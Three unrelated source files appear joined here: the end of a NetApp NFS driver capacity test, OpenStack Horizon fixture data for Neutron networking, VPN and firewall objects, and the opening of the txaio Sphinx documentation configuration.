{'size': 12, 'thin': False, 'over': 1.0, 'res': 0, 'expected': True},
{'size': 12, 'thin': False, 'over': 1.0, 'res': 5, 'expected': False},
{'size': 12, 'thin': True, 'over': 1.0, 'res': 5, 'expected': False},
{'size': 12, 'thin': True, 'over': 1.1, 'res': 5, 'expected': True},
{'size': 240, 'thin': True, 'over': 20.0, 'res': 0, 'expected': True},
{'size': 241, 'thin': True, 'over': 20.0, 'res': 0, 'expected': False},
)
@ddt.unpack
@mock.patch.object(nfs_base.NetAppNfsDriver, '_get_capacity_info')
def test_share_has_space_for_clone2(self,
mock_get_capacity,
size, thin, over, res, expected):
total_bytes = 20 * units.Gi
available_bytes = 12 * units.Gi
mock_get_capacity.return_value = (total_bytes, available_bytes)
with mock.patch.object(self.driver,
'max_over_subscription_ratio',
over):
with mock.patch.object(self.driver,
'reserved_percentage',
res):
result = self.driver._share_has_space_for_clone(
fake.NFS_SHARE,
size,
thin=thin)
self.assertEqual(expected, result)
|
|
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import uuid
from openstack_dashboard.api import base
from openstack_dashboard.api import fwaas
from openstack_dashboard.api import lbaas
from openstack_dashboard.api import neutron
from openstack_dashboard.api import vpn
from openstack_dashboard.test.test_data import utils
def data(TEST):
# data returned by openstack_dashboard.api.neutron wrapper
TEST.agents = utils.TestDataContainer()
TEST.networks = utils.TestDataContainer()
TEST.subnets = utils.TestDataContainer()
TEST.ports = utils.TestDataContainer()
TEST.routers = utils.TestDataContainer()
TEST.q_floating_ips = utils.TestDataContainer()
TEST.q_secgroups = utils.TestDataContainer()
TEST.q_secgroup_rules = utils.TestDataContainer()
TEST.providers = utils.TestDataContainer()
TEST.pools = utils.TestDataContainer()
TEST.vips = utils.TestDataContainer()
TEST.members = utils.TestDataContainer()
TEST.monitors = utils.TestDataContainer()
TEST.neutron_quotas = utils.TestDataContainer()
TEST.net_profiles = utils.TestDataContainer()
TEST.policy_profiles = utils.TestDataContainer()
TEST.network_profile_binding = utils.TestDataContainer()
TEST.policy_profile_binding = utils.TestDataContainer()
TEST.vpnservices = utils.TestDataContainer()
TEST.ikepolicies = utils.TestDataContainer()
TEST.ipsecpolicies = utils.TestDataContainer()
TEST.ipsecsiteconnections = utils.TestDataContainer()
TEST.firewalls = utils.TestDataContainer()
TEST.fw_policies = utils.TestDataContainer()
TEST.fw_rules = utils.TestDataContainer()
# data return by neutronclient
TEST.api_agents = utils.TestDataContainer()
TEST.api_networks = utils.TestDataContainer()
TEST.api_subnets = utils.TestDataContainer()
TEST.api_ports = utils.TestDataContainer()
TEST.api_routers = utils.TestDataContainer()
TEST.api_q_floating_ips = utils.TestDataContainer()
TEST.api_q_secgroups = utils.TestDataContainer()
TEST.api_q_secgroup_rules = utils.TestDataContainer()
TEST.api_pools = utils.TestDataContainer()
TEST.api_vips = utils.TestDataContainer()
TEST.api_members = utils.TestDataContainer()
TEST.api_monitors = utils.TestDataContainer()
TEST.api_extensions = utils.TestDataContainer()
TEST.api_net_profiles = utils.TestDataContainer()
TEST.api_policy_profiles = utils.TestDataContainer()
TEST.api_network_profile_binding = utils.TestDataContainer()
TEST.api_policy_profile_binding = utils.TestDataContainer()
TEST.api_vpnservices = utils.TestDataContainer()
TEST.api_ikepolicies = utils.TestDataContainer()
TEST.api_ipsecpolicies = utils.TestDataContainer()
TEST.api_ipsecsiteconnections = utils.TestDataContainer()
TEST.api_firewalls = utils.TestDataContainer()
TEST.api_fw_policies = utils.TestDataContainer()
TEST.api_fw_rules = utils.TestDataContainer()
#------------------------------------------------------------
# 1st network
network_dict = {'admin_state_up': True,
'id': '82288d84-e0a5-42ac-95be-e6af08727e42',
'name': 'net1',
'status': 'ACTIVE',
'subnets': ['e8abc972-eb0c-41f1-9edd-4bc6e3bcd8c9'],
'tenant_id': '1',
'router:external': False,
'shared': False}
subnet_dict = {'allocation_pools': [{'end': '10.0.0.254',
'start': '10.0.0.2'}],
'dns_nameservers': [],
'host_routes': [],
'cidr': '10.0.0.0/24',
'enable_dhcp': True,
'gateway_ip': '10.0.0.1',
'id': network_dict['subnets'][0],
'ip_version': 4,
'name': 'mysubnet1',
'network_id': network_dict['id'],
'tenant_id': network_dict['tenant_id']}
TEST.api_networks.add(network_dict)
TEST.api_subnets.add(subnet_dict)
network = copy.deepcopy(network_dict)
subnet = neutron.Subnet(subnet_dict)
network['subnets'] = [subnet]
TEST.networks.add(neutron.Network(network))
TEST.subnets.add(subnet)
# network profile for network when using the cisco n1k plugin
net_profile_dict = {'name': 'net_profile_test1',
'segment_type': 'vlan',
'physical_network': 'phys1',
'segment_range': '3000-31000',
'id':
'00000000-1111-1111-1111-000000000000',
'tenant_id': network_dict['tenant_id']}
TEST.api_net_profiles.add(net_profile_dict)
TEST.net_profiles.add(neutron.Profile(net_profile_dict))
# policy profile for port when using the cisco n1k plugin
policy_profile_dict = {'name': 'policy_profile_test1',
'id':
'00000000-9999-9999-9999-000000000000'}
TEST.api_policy_profiles.add(policy_profile_dict)
TEST.policy_profiles.add(neutron.Profile(policy_profile_dict))
# network profile binding
network_profile_binding_dict = {'profile_id':
'00000000-1111-1111-1111-000000000000',
'tenant_id': network_dict['tenant_id']}
TEST.api_network_profile_binding.add(network_profile_binding_dict)
TEST.network_profile_binding.add(neutron.Profile(
network_profile_binding_dict))
# policy profile binding
policy_profile_binding_dict = {'profile_id':
'00000000-9999-9999-9999-000000000000',
'tenant_id': network_dict['tenant_id']}
TEST.api_policy_profile_binding.add(policy_profile_binding_dict)
TEST.policy_profile_binding.add(neutron.Profile(
policy_profile_binding_dict))
# ports on 1st network
port_dict = {'admin_state_up': True,
'device_id': 'af75c8e5-a1cc-4567-8d04-44fcd6922890',
'device_owner': 'network:dhcp',
'fixed_ips': [{'ip_address': '10.0.0.3',
'subnet_id': subnet_dict['id']}],
'id': '063cf7f3-ded1-4297-bc4c-31eae876cc91',
'mac_address': 'fa:16:3e:9c:d5:7e',
'name': '',
'network_id': network_dict['id'],
'status': 'ACTIVE',
'tenant_id': network_dict['tenant_id']}
TEST.api_ports.add(port_dict)
TEST.ports.add(neutron.Port(port_dict))
port_dict = {'admin_state_up': True,
'device_id': '1',
'device_owner': 'compute:nova',
'fixed_ips': [{'ip_address': '10.0.0.4',
'subnet_id': subnet_dict['id']}],
'id': '7e6ce62c-7ea2-44f8-b6b4-769af90a8406',
'mac_address': 'fa:16:3e:9d:e6:2f',
'name': '',
'network_id': network_dict['id'],
'status': 'ACTIVE',
'tenant_id': network_dict['tenant_id']}
TEST.api_ports.add(port_dict)
TEST.ports.add(neutron.Port(port_dict))
assoc_port = port_dict
#------------------------------------------------------------
# 2nd network
network_dict = {'admin_state_up': True,
'id': '72c3ab6c-c80f-4341-9dc5-210fa31ac6c2',
'name': 'net2',
'status': 'ACTIVE',
'subnets': ['3f7c5d79-ee55-47b0-9213-8e669fb03009'],
'tenant_id': '2',
'router:external': False,
'shared': True}
subnet_dict = {'allocation_pools': [{'end': '172.16.88.254',
'start': '172.16.88.2'}],
'dns_nameservers': ['10.56.1.20', '10.56.1.21'],
'host_routes': [{'destination': '192.168.20.0/24',
'nexthop': '172.16.88.253'},
{'destination': '192.168.21.0/24',
'nexthop': '172.16.88.252'}],
'cidr': '172.16.88.0/24',
'enable_dhcp': True,
'gateway_ip': '172.16.88.1',
'id': '3f7c5d79-ee55-47b0-9213-8e669fb03009',
'ip_version': 4,
'name': 'aaaa',
'network_id': network_dict['id'],
'tenant_id': network_dict['tenant_id']}
TEST.api_networks.add(network_dict)
TEST.api_subnets.add(subnet_dict)
network = copy.deepcopy(network_dict)
subnet = neutron.Subnet(subnet_dict)
network['subnets'] = [subnet]
TEST.networks.add(neutron.Network(network))
TEST.subnets.add(subnet)
port_dict = {'admin_state_up': True,
'device_id': '2',
'device_owner': 'compute:nova',
'fixed_ips': [{'ip_address': '172.16.88.3',
'subnet_id': subnet_dict['id']}],
'id': '1db2cc37-3553-43fa-b7e2-3fc4eb4f9905',
'mac_address': 'fa:16:3e:56:e6:2f',
'name': '',
'network_id': network_dict['id'],
'status': 'ACTIVE',
'tenant_id': network_dict['tenant_id']}
TEST.api_ports.add(port_dict)
TEST.ports.add(neutron.Port(port_dict))
#------------------------------------------------------------
# external network
network_dict = {'admin_state_up': True,
'id': '9b466b94-213a-4cda-badf-72c102a874da',
'name': 'ext_net',
'status': 'ACTIVE',
'subnets': ['d6bdc71c-7566-4d32-b3ff-36441ce746e8'],
'tenant_id': '3',
'router:external': True,
'shared': False}
subnet_dict = {'allocation_pools': [{'start': '172.24.4.226.',
'end': '172.24.4.238'}],
'dns_nameservers': [],
'host_routes': [],
'cidr': '172.24.4.0/28',
'enable_dhcp': False,
'gateway_ip': '172.24.4.225',
'id': 'd6bdc71c-7566-4d32-b3ff-36441ce746e8',
'ip_version': 4,
'name': 'ext_subnet',
'network_id': network_dict['id'],
'tenant_id': network_dict['tenant_id']}
ext_net = network_dict
TEST.api_networks.add(network_dict)
TEST.api_subnets.add(subnet_dict)
network = copy.deepcopy(network_dict)
subnet = neutron.Subnet(subnet_dict)
network['subnets'] = [subnet]
TEST.networks.add(neutron.Network(network))
TEST.subnets.add(subnet)
#------------------------------------------------------------
# Set up router data
port_dict = {'admin_state_up': True,
'device_id': '7180cede-bcd8-4334-b19f-f7ef2f331f53',
'device_owner': 'network:router_gateway',
'fixed_ips': [{'ip_address': '10.0.0.3',
'subnet_id': subnet_dict['id']}],
'id': '44ec6726-4bdc-48c5-94d4-df8d1fbf613b',
'mac_address': 'fa:16:3e:9c:d5:7e',
'name': '',
'network_id': network_dict['id'],
'status': 'ACTIVE',
'tenant_id': '1'}
TEST.api_ports.add(port_dict)
TEST.ports.add(neutron.Port(port_dict))
router_dict = {'id': '279989f7-54bb-41d9-ba42-0d61f12fda61',
'name': 'router1',
'external_gateway_info':
{'network_id': ext_net['id']},
'tenant_id': '1'}
TEST.api_routers.add(router_dict)
TEST.routers.add(neutron.Router(router_dict))
router_dict = {'id': '10e3dc42-1ce1-4d48-87cf-7fc333055d6c',
'name': 'router2',
'external_gateway_info':
{'network_id': ext_net['id']},
'tenant_id': '1'}
TEST.api_routers.add(router_dict)
TEST.routers.add(neutron.Router(router_dict))
#------------------------------------------------------------
# floating IP
# unassociated
fip_dict = {'tenant_id': '1',
'floating_ip_address': '172.16.88.227',
'floating_network_id': ext_net['id'],
'id': '9012cd70-cfae-4e46-b71e-6a409e9e0063',
'fixed_ip_address': None,
'port_id': None,
'router_id': None}
TEST.api_q_floating_ips.add(fip_dict)
TEST.q_floating_ips.add(neutron.FloatingIp(fip_dict))
# associated (with compute port on 1st network)
fip_dict = {'tenant_id': '1',
'floating_ip_address': '172.16.88.228',
'floating_network_id': ext_net['id'],
'id': 'a97af8f2-3149-4b97-abbd-e49ad19510f7',
'fixed_ip_address': assoc_port['fixed_ips'][0]['ip_address'],
'port_id': assoc_port['id'],
'router_id': router_dict['id']}
TEST.api_q_floating_ips.add(fip_dict)
TEST.q_floating_ips.add(neutron.FloatingIp(fip_dict))
#------------------------------------------------------------
# security group
sec_group_1 = {'tenant_id': '1',
'description': 'default',
'id': 'faad7c80-3b62-4440-967c-13808c37131d',
'name': 'default'}
sec_group_2 = {'tenant_id': '1',
'description': 'NotDefault',
'id': '27a5c9a1-bdbb-48ac-833a-2e4b5f54b31d',
'name': 'other_group'}
sec_group_3 = {'tenant_id': '1',
'description': 'NotDefault',
'id': '443a4d7a-4bd2-4474-9a77-02b35c9f8c95',
'name': 'another_group'}
def add_rule_to_group(secgroup, default_only=True):
rule_egress_ipv4 = {
'id': str(uuid.uuid4()),
'direction': u'egress', 'ethertype': u'IPv4',
'port_range_min': None, 'port_range_max': None,
'protocol': None, 'remote_group_id': None,
'remote_ip_prefix': None,
'security_group_id': secgroup['id'],
'tenant_id': secgroup['tenant_id']}
rule_egress_ipv6 = {
'id': str(uuid.uuid4()),
'direction': u'egress', 'ethertype': u'IPv6',
'port_range_min': None, 'port_range_max': None,
'protocol': None, 'remote_group_id': None,
'remote_ip_prefix': None,
'security_group_id': secgroup['id'],
'tenant_id': secgroup['tenant_id']}
rule_tcp_80 = {
'id': str(uuid.uuid4()),
'direction': u'ingress', 'ethertype': u'IPv4',
'port_range_min': 80, 'port_range_max': 80,
'protocol': u'tcp', 'remote_group_id': None,
'remote_ip_prefix': u'0.0.0.0/0',
'security_group_id': secgroup['id'],
'tenant_id': secgroup['tenant_id']}
rule_icmp = {
'id': str(uuid.uuid4()),
'direction': u'ingress', 'ethertype': u'IPv4',
'port_range_min': 5, 'port_range_max': 8,
'protocol': u'icmp', 'remote_group_id': None,
'remote_ip_prefix': u'0.0.0.0/0',
'security_group_id': secgroup['id'],
'tenant_id': secgroup['tenant_id']}
rule_group = {
'id': str(uuid.uuid4()),
'direction': u'ingress', 'ethertype': u'IPv4',
'port_range_min': 80, 'port_range_max': 80,
'protocol': u'tcp', 'remote_group_id': sec_group_1['id'],
'remote_ip_prefix': None,
'security_group_id': secgroup['id'],
'tenant_id': secgroup['tenant_id']}
rules = []
if not default_only:
rules += [rule_tcp_80, rule_icmp, rule_group]
rules += [rule_egress_ipv4, rule_egress_ipv6]
secgroup['security_group_rules'] = rules
add_rule_to_group(sec_group_1, default_only=False)
add_rule_to_group(sec_group_2)
add_rule_to_group(sec_group_3)
groups = [sec_group_1, sec_group_2, sec_group_3]
sg_name_dict = dict([(sg['id'], sg['name']) for sg in groups])
for sg in groups:
# Neutron API
TEST.api_q_secgroups.add(sg)
for rule in sg['security_group_rules']:
TEST.api_q_secgroup_rules.add(copy.copy(rule))
# OpenStack Dashboard internaly API
TEST.q_secgroups.add(
neutron.SecurityGroup(copy.deepcopy(sg), sg_name_dict))
for rule in sg['security_group_rules']:
TEST.q_secgroup_rules.add(
neutron.SecurityGroupRule(copy.copy(rule), sg_name_dict))
#------------------------------------------------------------
# LBaaS
# 1st pool
pool_dict = {'id': '8913dde8-4915-4b90-8d3e-b95eeedb0d49',
'tenant_id': '1',
'vip_id': 'abcdef-c3eb-4fee-9763-12de3338041e',
'name': 'pool1',
'description': 'pool description',
'subnet_id': TEST.subnets.first().id,
'protocol': 'HTTP',
'lb_method': 'ROUND_ROBIN',
'health_monitors': ['d4a0500f-db2b-4cc4-afcf-ec026febff96'],
'admin_state_up': True,
'provider': 'haproxy'}
TEST.api_pools.add(pool_dict)
TEST.pools.add(lbaas.Pool(pool_dict))
# 1st vip
vip_dict = {'id': 'abcdef-c3eb-4fee-9763-12de3338041e',
'name': 'vip1',
'address': '10.0.0.100',
'floatip_address': '',
'other_address': '10.0.0.100',
'description': 'vip description',
'subnet_id': TEST.subnets.first().id,
'subnet': TEST.subnets.first().cidr,
'protocol_port': 80,
'protocol': pool_dict['protocol'],
'pool_id': pool_dict['id'],
'session_persistence': {'type': 'APP_COOKIE',
'cookie_name': 'jssessionid'},
'connection_limit': 10,
'admin_state_up': True}
TEST.api_vips.add(vip_dict)
TEST.vips.add(lbaas.Vip(vip_dict))
# 2nd vip
vip_dict = {'id': 'f0881d38-c3eb-4fee-9763-12de3338041d',
'name': 'vip2',
'address': '10.0.0.110',
'floatip_address': '',
'other_address': '10.0.0.110',
'description': 'vip description',
'subnet_id': TEST.subnets.first().id,
'subnet': TEST.subnets.first().cidr,
'protocol_port': 80,
'protocol': pool_dict['protocol'],
'pool_id': pool_dict['id'],
'session_persistence': {'type': 'APP_COOKIE',
'cookie_name': 'jssessionid'},
'connection_limit': 10,
'admin_state_up': True}
TEST.api_vips.add(vip_dict)
TEST.vips.add(lbaas.Vip(vip_dict))
# 1st member
member_dict = {'id': '78a46e5e-eb1a-418a-88c7-0e3f5968b08',
'tenant_id': '1',
'pool_id': pool_dict['id'],
'address': '10.0.0.11',
'protocol_port': 80,
'weight': 10,
'admin_state_up': True}
TEST.api_members.add(member_dict)
TEST.members.add(lbaas.Member(member_dict))
# 2nd member
member_dict = {'id': '41ac1f8d-6d9c-49a4-a1bf-41955e651f91',
'tenant_id': '1',
'pool_id': pool_dict['id'],
'address': '10.0.0.12',
'protocol_port': 80,
'weight': 10,
'admin_state_up': True}
TEST.api_members.add(member_dict)
TEST.members.add(lbaas.Member(member_dict))
# 2nd pool
pool_dict = {'id': '8913dde8-4915-4b90-8d3e-b95eeedb0d50',
'tenant_id': '1',
'vip_id': 'f0881d38-c3eb-4fee-9763-12de3338041d',
'name': 'pool2',
'description': 'pool description',
'subnet_id': TEST.subnets.first().id,
'protocol': 'HTTPS',
'lb_method': 'ROUND_ROBIN',
'health_monitors': ['d4a0500f-db2b-4cc4-afcf-ec026febff97'],
'admin_state_up': True}
TEST.api_pools.add(pool_dict)
TEST.pools.add(lbaas.Pool(pool_dict))
# 1st monitor
monitor_dict = {'id': 'd4a0500f-db2b-4cc4-afcf-ec026febff96',
'type': 'ping',
'delay': 10,
'timeout': 10,
'max_retries': 10,
'http_method': 'GET',
'url_path': '/',
'expected_codes': '200',
'admin_state_up': True}
TEST.api_monitors.add(monitor_dict)
TEST.monitors.add(lbaas.PoolMonitor(monitor_dict))
# 2nd monitor
monitor_dict = {'id': 'd4a0500f-db2b-4cc4-afcf-ec026febff97',
'type': 'ping',
'delay': 10,
'timeout': 10,
'max_retries': 10,
'http_method': 'GET',
'url_path': '/',
'expected_codes': '200',
'admin_state_up': True}
TEST.api_monitors.add(monitor_dict)
TEST.monitors.add(lbaas.PoolMonitor(monitor_dict))
#------------------------------------------------------------
# Quotas
quota_data = {'network': '10',
'subnet': '10',
'port': '50',
'router': '10',
'floatingip': '50',
'security_group': '20',
'security_group_rule': '100',
}
TEST.neutron_quotas.add(base.QuotaSet(quota_data))
#------------------------------------------------------------
# Extensions
extension_1 = {"name": "security-group",
"alias": "security-group",
"description": "The security groups extension."}
extension_2 = {"name": "Quota management support",
"alias": "quotas",
"description": "Expose functions for quotas management"}
TEST.api_extensions.add(extension_1)
TEST.api_extensions.add(extension_2)
#------------------------------------------------------------
# 1st agent
agent_dict = {"binary": "neutron-openvswitch-agent",
"description": None,
"admin_state_up": True,
"heartbeat_timestamp": "2013-07-26 06:51:47",
"alive": True,
"id": "c876ff05-f440-443e-808c-1d34cda3e88a",
"topic": "N/A",
"host": "devstack001",
"agent_type": "Open vSwitch agent",
"started_at": "2013-07-26 05:23:28",
"created_at": "2013-07-26 05:23:28",
"configurations": {"devices": 2}}
TEST.api_agents.add(agent_dict)
TEST.agents.add(neutron.Agent(agent_dict))
# 2nd agent
agent_dict = {"binary": "neutron-dhcp-agent",
"description": None,
"admin_state_up": True,
"heartbeat_timestamp": "2013-07-26 06:51:48",
"alive": True,
"id": "f0d12e3d-1973-41a2-b977-b95693f9a8aa",
"topic": "dhcp_agent",
"host": "devstack001",
"agent_type": "DHCP agent",
"started_at": "2013-07-26 05:23:30",
"created_at": "2013-07-26 05:23:30",
"configurations": {
"subnets": 1,
"use_namespaces": True,
"dhcp_lease_duration": 120,
"dhcp_driver": "neutron.agent.linux.dhcp.Dnsmasq",
"networks": 1,
"ports": 1}}
TEST.api_agents.add(agent_dict)
TEST.agents.add(neutron.Agent(agent_dict))
#------------------------------------------------------------
# Service providers
provider_1 = {"service_type": "LOADBALANCER",
"name": "haproxy",
"default": True}
TEST.providers.add(provider_1)
#------------------------------------------------------------
# VPNaaS
# 1st VPNService
vpnservice_dict = {'id': '09a26949-6231-4f72-942a-0c8c0ddd4d61',
'tenant_id': '1',
'name': 'cloud_vpn1',
'description': 'vpn description',
'subnet_id': TEST.subnets.first().id,
'router_id': TEST.routers.first().id,
'vpn_type': 'ipsec',
'ipsecsiteconnections': [],
'admin_state_up': True,
'status': 'Active'}
TEST.api_vpnservices.add(vpnservice_dict)
TEST.vpnservices.add(vpn.VPNService(vpnservice_dict))
# 2nd VPNService
vpnservice_dict = {'id': '09a26949-6231-4f72-942a-0c8c0ddd4d62',
'tenant_id': '1',
'name': 'cloud_vpn2',
'description': 'vpn description',
'subnet_id': TEST.subnets.first().id,
'router_id': TEST.routers.first().id,
'vpn_type': 'ipsec',
'ipsecsiteconnections': [],
'admin_state_up': True,
'status': 'Active'}
TEST.api_vpnservices.add(vpnservice_dict)
TEST.vpnservices.add(vpn.VPNService(vpnservice_dict))
# 1st IKEPolicy
ikepolicy_dict = {'id': 'a1f009b7-0ffa-43a7-ba19-dcabb0b4c981',
'tenant_id': '1',
'name': 'ikepolicy_1',
'description': 'ikepolicy description',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-256',
'ike_version': 'v1',
'lifetime': {'units': 'seconds', 'value': 3600},
'phase1_negotiation_mode': 'main',
'pfs': 'group5'}
TEST.api_ikepolicies.add(ikepolicy_dict)
TEST.ikepolicies.add(vpn.IKEPolicy(ikepolicy_dict))
# 2nd IKEPolicy
ikepolicy_dict = {'id': 'a1f009b7-0ffa-43a7-ba19-dcabb0b4c982',
'tenant_id': '1',
'name': 'ikepolicy_2',
'description': 'ikepolicy description',
'auth_algorithm': 'sha1',
'encryption_algorithm': 'aes-256',
'ike_version': 'v1',
'lifetime': {'units': 'seconds', 'value': 3600},
'phase1_negotiation_mode': 'main',
'pfs': 'group5'}
TEST.api_ikepolicies.add(ikepolicy_dict)
TEST.ikepolicies.add(vpn.IKEPolicy(ikepolicy_dict))
# 1st IPSecPolicy
ipsecpolicy_dict = {'id': '8376e1dd-2b1c-4346-b23c-6989e75ecdb8',
'tenant_id': '1',
'name': 'ipsecpolicy_1',
'description': 'ipsecpolicy description',
'auth_algorithm': 'sha1',
'encapsulation_mode': 'tunnel',
'encryption_algorithm': '3des',
'lifetime': {'units': 'seconds', 'value': 3600},
'pfs': 'group5',
'transform_protocol': 'esp'}
TEST.api_ipsecpolicies.add(ipsecpolicy_dict)
TEST.ipsecpolicies.add(vpn.IPSecPolicy(ipsecpolicy_dict))
# 2nd IPSecPolicy
ipsecpolicy_dict = {'id': '8376e1dd-2b1c-4346-b23c-6989e75ecdb9',
'tenant_id': '1',
'name': 'ipsecpolicy_2',
'description': 'ipsecpolicy description',
'auth_algorithm': 'sha1',
'encapsulation_mode': 'tunnel',
'encryption_algorithm': '3des',
'lifetime': {'units': 'seconds', 'value': 3600},
'pfs': 'group5',
'transform_protocol': 'esp'}
TEST.api_ipsecpolicies.add(ipsecpolicy_dict)
TEST.ipsecpolicies.add(vpn.IPSecPolicy(ipsecpolicy_dict))
# 1st IPSecSiteConnection
ipsecsiteconnection_dict = {'id': 'dd1dd3a0-f349-49be-b013-245e147763d6',
'tenant_id': '1',
'name': 'ipsec_connection_1',
'description': 'vpn connection description',
'dpd': {'action': 'hold',
'interval': 30,
'timeout': 120},
'ikepolicy_id': ikepolicy_dict['id'],
'initiator': 'bi-directional',
'ipsecpolicy_id': ipsecpolicy_dict['id'],
'mtu': '1500',
'peer_address':
'2607:f0d0:4545:3:200:f8ff:fe21:67cf',
'peer_cidrs': '20.1.0.0/24',
'peer_id': '2607:f0d0:4545:3:200:f8ff:fe21:67cf',
'psk': 'secret',
'vpnservice_id': vpnservice_dict['id'],
'admin_state_up': True,
'status': 'Active'}
TEST.api_ipsecsiteconnections.add(ipsecsiteconnection_dict)
TEST.ipsecsiteconnections.add(
vpn.IPSecSiteConnection(ipsecsiteconnection_dict))
# 2nd IPSecSiteConnection
ipsecsiteconnection_dict = {'id': 'dd1dd3a0-f349-49be-b013-245e147763d7',
'tenant_id': '1',
'name': 'ipsec_connection_2',
'description': 'vpn connection description',
'dpd': {'action': 'hold',
'interval': 30,
'timeout': 120},
'ikepolicy_id': ikepolicy_dict['id'],
'initiator': 'bi-directional',
'ipsecpolicy_id': ipsecpolicy_dict['id'],
'mtu': '1500',
'peer_address': '172.0.0.2',
'peer_cidrs': '20.1.0.0/24',
'peer_id': '172.0.0.2',
'psk': 'secret',
'vpnservice_id': vpnservice_dict['id'],
'admin_state_up': True,
'status': 'Active'}
TEST.api_ipsecsiteconnections.add(ipsecsiteconnection_dict)
TEST.ipsecsiteconnections.add(
vpn.IPSecSiteConnection(ipsecsiteconnection_dict))
# FWaaS
# 1st rule
rule1_dict = {'id': 'f0881d38-c3eb-4fee-9763-12de3338041d',
'tenant_id': '1',
'name': 'rule1',
'description': 'rule1 description',
'protocol': 'tcp',
'action': 'allow',
'source_ip_address': '1.2.3.0/24',
'source_port': '80',
'destination_ip_address': '4.5.6.7/32',
'destination_port': '1:65535',
'firewall_policy_id': 'abcdef-c3eb-4fee-9763-12de3338041e',
'position': 1,
'shared': True,
'enabled': True}
TEST.api_fw_rules.add(rule1_dict)
TEST.fw_rules.add(fwaas.Rule(rule1_dict))
# 2nd rule
rule2_dict = {'id': 'g0881d38-c3eb-4fee-9763-12de3338041d',
'tenant_id': '1',
'name': 'rule2',
'description': 'rule2 description',
'protocol': 'udp',
'action': 'deny',
'source_ip_address': '1.2.3.0/24',
'source_port': '80',
'destination_ip_address': '4.5.6.7/32',
'destination_port': '1:65535',
'firewall_policy_id': 'abcdef-c3eb-4fee-9763-12de3338041e',
'position': 2,
'shared': True,
'enabled': True}
TEST.api_fw_rules.add(rule2_dict)
TEST.fw_rules.add(fwaas.Rule(rule2_dict))
# 3rd rule
rule3_dict = {'id': 'h0881d38-c3eb-4fee-9763-12de3338041d',
'tenant_id': '1',
'name': 'rule3',
'description': 'rule3 description',
'protocol': 'icmp',
'action': 'allow',
'source_ip_address': '1.2.3.0/24',
'source_port': '80',
'destination_ip_address': '4.5.6.7/32',
'destination_port': '1:65535',
'firewall_policy_id': None,
'position': None,
'shared': True,
'enabled': True}
TEST.api_fw_rules.add(rule3_dict)
TEST.fw_rules.add(fwaas.Rule(rule3_dict))
# 1st policy
policy_dict = {'id': 'abcdef-c3eb-4fee-9763-12de3338041e',
'tenant_id': '1',
'name': 'policy1',
'description': 'policy description',
'firewall_rules': [rule1_dict['id'], rule2_dict['id']],
'audited': True,
'shared': True}
TEST.api_fw_policies.add(policy_dict)
TEST.fw_policies.add(fwaas.Policy(policy_dict))
# 1st firewall
firewall_dict = {'id': '8913dde8-4915-4b90-8d3e-b95eeedb0d49',
'tenant_id': '1',
'firewall_policy_id':
'abcdef-c3eb-4fee-9763-12de3338041e',
'name': 'firewall1',
'description': 'firewall description',
'status': 'PENDING_CREATE',
'shared': True,
'admin_state_up': True}
TEST.api_firewalls.add(firewall_dict)
TEST.firewalls.add(fwaas.Firewall(firewall_dict))
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# txaio documentation build configuration file, created by
# sphinx-quickstart on Wed Mar 18 14:29:26 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import time
try:
import sphinx_rtd_theme
except ImportError:
sphinx_rtd_theme = None
try:
from sphinxcontrib import spelling
except ImportError:
spelling = None
# Monkey patch away WARNING like:
# "index.rst:4: WARNING: nonlocal image URI found: https://img.shields.io/pypi/v/txaio.svg"
# see: http://stackoverflow.com/a/28778969
import sphinx.environment
from docutils.utils import get_source_line
def _warn_node(self, msg, node, **kwargs):
if not msg.startswith('nonlocal image URI found:'):
self._warnfunc(msg, '%s:%s' % get_source_line(node))
sphinx.environment.BuildEnvironment.warn_node = _warn_node
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Check if we are building on readthedocs
RTD_BUILD = os.environ.get('READTHEDOCS', None) == 'True'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx',
]
# extensions not available on RTD
if spelling is not None:
extensions.append('sphinxcontrib.spelling')
spelling_lang = 'en_US'
spelling_show_suggestions = False
spelling_word_list_filename = 'spelling_wordlist.txt'
# custom txaio extension configuration
autodoc_member_order = 'bysource'
autodoc_default_flags = ['members', 'show-inheritance', 'undoc-members']
autoclass_content = 'both'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'contents'
# General information about the project.
project = 'txaio'
author = 'Crossbar.io Project'
this_year = '{0}'.format(time.strftime('%Y'))
if this_year != '2015':
copyright = '2015-{0}, Crossbar.io Technologies GmbH'.format(this_year)
else:
copyright = '2015, Crossbar.io Technologies GmbH'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
base_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
with open(os.path.join(base_dir, "txaio", "_version.py")) as f:
exec(f.read()) # defines __version__
version = release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
